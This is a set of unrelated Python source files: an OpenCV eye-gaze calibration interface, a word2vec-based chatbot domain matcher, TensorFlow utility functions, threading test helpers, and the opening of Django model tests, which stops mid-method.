cv2.rectangle(camFrame, self.rectLoc[idx][0], self.rectLoc[idx][1], self.color["green"], -1)
cv2.putText(camFrame, self.rectLoc[idx][2][0], self.rectLoc[idx][2][1], cv2.FONT_HERSHEY_DUPLEX, 0.7, self.color["white"], 1)
else:
cv2.rectangle(camFrame, self.rectLoc[idx][0], self.rectLoc[idx][1], self.color["gray"], -1)
cv2.putText(camFrame, self.rectLoc[idx][2][0], self.rectLoc[idx][2][1], cv2.FONT_HERSHEY_DUPLEX, 0.7, self.color["darkGray"], 1)
if self.gaze.pupils_located:
if self.direction == 0: # recommend up
cv2.putText(camFrame, "recommend : " + str(round(self.gaze.vertical_ratio(),2)), (90,140), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 1, cv2.LINE_AA)
elif self.direction == 1: # recommend down
cv2.putText(camFrame, "recommend : " + str(round(self.gaze.vertical_ratio(),2)), (90,140), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 1, cv2.LINE_AA)
elif self.direction == 2: # recommend left
cv2.putText(camFrame, "recommend : " + str(round(self.gaze.horizontal_ratio(),2)), (90,140), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 1, cv2.LINE_AA)
elif self.direction == 3: # recommend right
cv2.putText(camFrame, "recommend : " + str(round(self.gaze.horizontal_ratio(),2)), (90,140), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 1, cv2.LINE_AA)
else:
pass
# keyboard input and events
if keyboard.is_pressed('left arrow'):
print('keyboard pressed')
if sensitivity_x > 250:
sensitivity_x -= 1
elif keyboard.is_pressed('right arrow'):
if sensitivity_x < 550:
sensitivity_x += 1
elif keyboard.is_pressed('up arrow'):
if self.direction > 0:
self.direction -= 1
self.show_fix()
elif keyboard.is_pressed('down arrow'):
if self.direction < 3:
self.direction += 1
self.show_fix()
elif keyboard.is_pressed('enter'): # init
if self.direction == 0:
self.sens['up'] = 1.5
elif self.direction == 1:
self.sens['down'] = 1.5
elif self.direction == 2:
self.sens['left'] = 1.5
elif self.direction == 3:
self.sens['right'] = 1.5
self.show_fix()
thread_sound = threading.Thread(target=play_narrator, args=("효과음", "ding",))
thread_sound.start()
elif keyboard.is_pressed('n'):
self.open()
is_next = True
# keyboard release events: needs fixing
# elif keyboard.release('down arrow') or keyboard.release('up arrow') or keyboard.release('right arrow') or keyboard.release('left arrow'):
# print('keyboard released')
# self.set_sensitivity()
else:
pass
# sensitivity adjustment
'''self.gaze.change_limit(self.direction, self.sensitivity)'''
# show the window
cv2.imshow("calibration", camFrame)
cv2.setMouseCallback('calibration', self.mouseEvent)
if cv2.waitKey(1) == 27:
break
# apply the adjusted sensitivity and reflect it on screen immediately
def set_sensitivity(self):
if self.direction == 0:
self.sens['up'] = (sensitivity_x - 250) / 100
elif self.direction == 1:
self.sens['down'] = (sensitivity_x - 250) / 100
elif self.direction == 2:
self.sens['left'] = (sensitivity_x - 250) / 100
elif self.direction == 3:
self.sens['right'] = (sensitivity_x - 250) / 100
self.r_sens['up'] = self.sens['up']
self.r_sens['down'] = self.sens['down']
self.r_sens['right'] = self.sens['right']
self.r_sens['left'] = self.sens['left']
self.r_sens = self.r_sens[['up', 'down', 'right', 'left']]
self.r_sens.to_csv('./file/sensitivity.csv')
self.load_sens()
self.gaze.load_threshold()
# show the stored value on the slider
def show_fix(self):
global sensitivity_x
if self.direction == 0:
sensitivity_x = int(self.sens['up'] * 100.0 + 250.0)
elif self.direction == 1:
sensitivity_x = int(self.sens['down'] * 100.0 + 250.0)
elif self.direction == 2:
sensitivity_x = int(self.sens['left'] * 100.0 + 250.0)
elif self.direction == 3:
sensitivity_x = int(self.sens['right'] * 100.0 + 250.0)
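# Mapping note (derived from the code above): the slider spans x = 250..550 px and
# sensitivity = (x - 250) / 100, so values range from 0.0 to 3.0; a default
# sensitivity of 1.5 lands at x = 400, matching the module-level initial sensitivity_x.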
# mouse event handler
def mouseEvent(self, event, x, y, flags, param):
global sensitivity_x
global is_mouse_down
global is_next
if event == cv2.EVENT_LBUTTONDOWN:
print('button click')
# slider
if 250 <= x <= 550 and 545 <= y <= 555:
is_mouse_down = True
sensitivity_x = x
# direction selection buttons on the right
if 700 <= x <= 750 and 185 <= y <= 235: # up button
self.direction = 0
self.show_fix()
elif 700 <= x <= 750 and 245 <= y <= 295: # down button
self.direction = 1
self.show_fix()
elif 700 <= x <= 750 and 305 <= y <= 355: # left button
self.direction = 2
self.show_fix()
elif 700 <= x <= 750 and 365 <= y <= 415: # right button
self.direction = 3
self.show_fix()
elif 690 <= x <= 760 and 535 <= y <= 565: # next button
self.open()
is_next = True
elif 100 <= x <= 170 and 535 <= y <= 565: # back button
is_next = True
self.cam_th = threading.Thread(target=self.cameraON)
self.showFullScreen()
# reset button
elif 590 <= x <= 660 and 535 <= y <= 565: # init button
if self.direction == 0:
self.sens['up'] = 1.5
elif self.direction == 1:
self.sens['down'] = 1.5
elif self.direction == 2:
self.sens['left'] = 1.5
elif self.direction == 3:
self.sens['right'] = 1.5
self.show_fix()
thread_sound = threading.Thread(target=play_narrator, args=("효과음", "ding",))
thread_sound.start()
elif event == cv2.EVENT_MOUSEMOVE and is_mouse_down is True:
print('slider drag')
if 250 <= x <= 550 and 545 <= y <= 555:
sensitivity_x = x
elif x < 250:
sensitivity_x = 250
elif x > 550:
sensitivity_x = 550
elif event == cv2.EVENT_LBUTTONUP:
is_mouse_down = False
self.set_sensitivity()
def starter(self, titleClass):
self.titleClass = titleClass
self.showFullScreen()
print('def start')
if __name__ == "__main__":
app = QApplication(sys.argv)
form = main()
form.showFullScreen()
sys.exit(app.exec_())
|
matcher.py
|
import os
import json
from app.modules import jieba_tw as jieba_tw
import app.modules.logger.logging as log
from config import BASE_DIR, LOG_DIR
import fnmatch
from app.modules.domain_chatbot.user import User
from gensim.models import word2vec
from app.modules.pinyin_compare import pinyin
import threading
import queue
from time import ctime
class Matcher():
def __init__(self):
try:
# set jieba dict
jieba_tw.set_dictionary(os.path.join(BASE_DIR, 'domain_matcher/jieba_dict/mydict.txt'))
# set stopwords
self.stopword_set = set()
with open(os.path.join(BASE_DIR, 'domain_matcher/jieba_dict/stopwords.txt'),'r', encoding='utf-8') as stopwords:
for stopword in stopwords:
self.stopword_set.add(stopword.strip('\n'))
print('init Matcher')
except:
print('init error')
def load_word2vec_model(self, MODEL_PATH):
try:
self.model = word2vec.Word2Vec.load(MODEL_PATH)
except:
print('load word2vec model error :(')
def load_rule_data(self, RULE_DIR):
file_data = []
for filename in os.listdir(RULE_DIR):
print("Loading: %s" % filename)
with open(os.path.join(RULE_DIR, filename), 'r', encoding = 'UTF-8') as f:
data = json.load(f)
file_data.append(data)
self.rule_data = file_data
def filter_stopwords(self, sentence):
newsen = '' # sentence with stopwords removed
jieba_tw.load_userdict(os.path.join(BASE_DIR, 'domain_matcher/custom/custom_key_words.txt'))
words = jieba_tw.cut(sentence, cut_all=False)
for word in words:
if word not in self.stopword_set:
newsen += word
return newsen
# flag => mainly used to decide whether this call is setting a personalized phrase
# nickname => distinguishes whether the current user has a personalized phrase configured
def match_domain(self, sentence, flag=None, user_nickname=None):
# capture the sentence before word segmentation, for later uploading the conversation log to the database
User.get_question(sentence, user_nickname)
# personalized custom phrases skip word segmentation, and domain='none'
if flag == 'user_nickname':
jieba_tw.add_word(sentence, freq=200000)
key_words = jieba_tw.cut(sentence, cut_all=False)
key_words = list(key_words)
print('key_words: %s' % key_words)
else:
newsen = self.filter_stopwords(sentence)
key_words = jieba_tw.cut(newsen, cut_all=False)
key_words = list(key_words)
print('key_words: %s' % key_words)
domain_score = self.match_domain_alg(key_words)
return domain_score
def match_domain_alg(self, key_words):
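# Summary of the scoring below: for every keyword, average the word2vec similarity
# against each rule's concepts, track the domain with the highest average, and accept
# it only when that average exceeds the 0.6 threshold; purely numeric tokens are
# tagged with the numeric domain directly, and words missing from the model (or left
# unmatched) fall back to the pinyin-based custom rules.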
logger = log.Logging('domain_match')
logger.run(LOG_DIR)
domain_score = []
for word in key_words:
try:
float(word)
dic = {'word': word, 'domain': '數字', 'result': []}
domain_score.append(dic)
except:
exist_case = False
err_message = ''
dic = {'word': word, 'domain': '', 'result': []}
threshold = 0.6
# 180712: pick the domain with the highest probability
max_score = 0
predict_domain = 'none'
for rule in self.rule_data:
domain = rule['domain']
score = 0
concept_count = 0
for concept in rule['concepts']:
try:
similarity = self.model.similarity(word, concept)
score += similarity
concept_count += 1
log_msg = 'similarity: %f, word: %s, concept: %s, score: %f, concept_count: %d' % (
self.model.similarity(word, concept), word, concept, score, concept_count)
logger.debug_msg(log_msg)
print('-----------')
print('similarity:', self.model.similarity(word, concept))
print('word:', word)
print('concept:', concept)
print('concept_count:', concept_count)
except KeyError as err:
exist_case = True
err_message = err
break
if concept_count == 0:
avg_score = 0
else:
avg_score = score / concept_count
# 180712
if avg_score > max_score:
max_score = avg_score
dic['result'].append({domain: avg_score})
# 180712: only accept the largest prediction score
if avg_score>threshold and avg_score==max_score:
predict_domain = domain
dic['domain'] = predict_domain
success_msg = 'result => word: %s, avg_score: %f, this_domain: %s, predict_domain: %s' % (
word, avg_score, domain, predict_domain)
logger.debug_msg(success_msg)
print(success_msg)
else:
print('-----------')
dic['domain'] = predict_domain
fail_msg = 'result => word: %s, avg_score: %f, this_domain: %s, predict_domain: %s' % (
word, avg_score, domain, predict_domain)
logger.debug_msg(fail_msg)
print(fail_msg)
# 180713: if predict_domain is still none, also search the custom rules
if predict_domain == 'none':
exist_case = True
if exist_case:
predict_domain = self.match_custom_key_words(word)
if predict_domain is not None:
dic['domain'] = predict_domain
else:
logger.error_msg(err_message)
print('-----------')
print(err_message)
domain_score.append(dic)
return domain_score
def match_custom_key_words(self, word):
print(word, 'running custom comparison')
file_data = []
for filename in os.listdir(os.path.join(BASE_DIR, 'domain_matcher/custom')):
if fnmatch.fnmatch(filename, '*.json'):
with open(os.path.join(BASE_DIR, 'domain_matcher/custom/' + filename), 'r', encoding='UTF-8') as f:
data = json.load(f)
file_data.append(data)
# compare with multiple threads
threads = []
q = queue.Queue()
for rule in file_data:
t = threading.Thread(target=self.custom_compare, args=(q, rule, word))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
if not q.empty():
queue_domain = []
while(not q.empty()):
queue_domain.append(q.get())
print('queue domain items:', queue_domain)
if '是' in queue_domain:
return '是'
elif '非' in queue_domain:
return '非'
else:
return queue_domain[0]
else:
return None
def custom_compare(self, q, rule, word):
domain = rule['domain']
print(domain, 'start thread at :', ctime())
get_result_flag = False
for concept in rule['pinyin_concepts']:
if pinyin.compare_with_pinyin(word, concept):
q.put(domain)
get_result_flag = True
print(domain, 'done thread at :', ctime())
break
if get_result_flag is False:
print(domain, 'done thread at :', ctime())
|
tf_util.py
|
import joblib
import numpy as np
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
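# Note: 0.5*(1+leak)*x + 0.5*(1-leak)*|x| equals x for x >= 0 and leak*x for x < 0,
# i.e. this is the usual leaky ReLU max(x, leak*x) written without a branch.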
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
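# Worked example: with delta=1.0, huber_loss(0.5) = 0.5*0.25 = 0.125 (quadratic region)
# and huber_loss(2.0) = 1.0*(2.0 - 0.5) = 1.5 (linear region).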
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize(sess=None):
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
if sess is None:
get_session().run(tf.variables_initializer(new_variables))
else:
sess.run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_outputs=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
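# Illustrative round-trip sketch (demo only, hypothetical variable name):
# GetFlat reads all variables as one flat vector; SetFromFlat writes such a
# vector back into the variables.
def _flat_roundtrip_example():
    with tf.Session() as sess:
        v = tf.get_variable("flat_demo_v", initializer=tf.constant([[1.0, 2.0], [3.0, 4.0]]))
        sess.run(tf.variables_initializer([v]))
        get_flat, set_from_flat = GetFlat([v]), SetFromFlat([v])
        theta = get_flat()            # -> [1. 2. 3. 4.]
        set_from_flat(theta * 2.0)    # v is now [[2. 4.] [6. 8.]]
        return get_flat()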
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(
name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/biases" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " " * (55 - len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params * 1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None, vars=None):
from baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver(var_list=vars)
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables_parallel(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
for v in variables:
name = v.name.split('/')[1:]
restores.append(v.assign(loaded_params['/'.join(name)]))
sess.run(restores)
def load_variables(load_path, variables=None, sess=None, extra_vars=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
if extra_vars is not None:
for k, v in extra_vars.items():
loaded_params[k] = v
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
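# Illustrative save/load round-trip sketch (hypothetical path and variable name,
# demo only): save one variable, clobber it, then restore it from disk.
def _save_load_example(path="/tmp/tf_util_demo.joblib"):
    with tf.Session() as sess:
        v = tf.get_variable("save_demo_v", initializer=tf.constant([1.0, 2.0]))
        sess.run(tf.variables_initializer([v]))
        save_variables(path, variables=[v], sess=sess)
        sess.run(v.assign([0.0, 0.0]))
        load_variables(path, variables=[v], sess=sess)
        return sess.run(v)  # -> [1. 2.]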
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
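# Illustrative sketch (demo only): a flat list is reshaped to fit a (None, 3)
# placeholder, so it can be fed as a single-row batch.
def _adjust_shape_example():
    ph = tf.placeholder(tf.float32, [None, 3], name="adjust_shape_demo")
    return adjust_shape(ph, [1.0, 2.0, 3.0]).shape  # -> (1, 3)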
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
return True  # shape checking is effectively disabled; the code below is unreachable
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
util.py
|
from threading import Thread
class DummyException(Exception):
"""
A more specific error to call during the tests.
"""
def __init__(self, val=0):
self.val = val
def func_exception():
raise DummyException()
def func_succeed():
return True
async def func_succeed_async():
return True
async def func_exception_async():
raise DummyException()
def func_succeed_counted():
def func_succeed():
func_succeed.call_count += 1
return True
func_succeed.call_count = 0
return func_succeed
def func_succeed_counted_async():
async def func_succeed_async():
func_succeed_async.call_count += 1
return True
func_succeed_async.call_count = 0
return func_succeed_async
def start_threads(target_function, n):
"""
Starts `n` threads that calls the target function and waits for them to finish.
"""
threads = [Thread(target=target_function) for _ in range(n)]
for t in threads:
t.start()
for t in threads:
t.join()
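# Illustrative usage sketch (demo only): run a counted stub on several threads
# and inspect how many times it was called.
if __name__ == "__main__":
    counted = func_succeed_counted()
    start_threads(counted, 5)
    print(counted.call_count)  # expected 5 (increments are unsynchronized; fine for a demo)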
|
tests.py
|
import threading
from datetime import datetime, timedelta
from unittest import mock
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections, models
from django.db.models.manager import BaseManager
from django.db.models.query import MAX_GET_RESULTS, EmptyQuerySet, QuerySet
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, skipUnlessDBFeature,
)
from django.utils.translation import gettext_lazy
from .models import (
Article, ArticleSelectOnSave, FeaturedArticle, PrimaryKeyWithDefault,
SelfRef,
)
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
with self.assertRaisesMessage(TypeError, "Article() got an unexpected keyword argument 'foo'"):
Article(
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertIsNotNone(a.id)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date, datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date, datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Parrot programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
def test_save_primary_with_default(self):
# An UPDATE attempt is skipped when a primary key has default.
with self.assertNumQueries(1):
PrimaryKeyWithDefault().save()
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
with self.assertRaisesMessage(AttributeError, "Manager isn't accessible via Article instances"):
getattr(Article(), "objects",)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
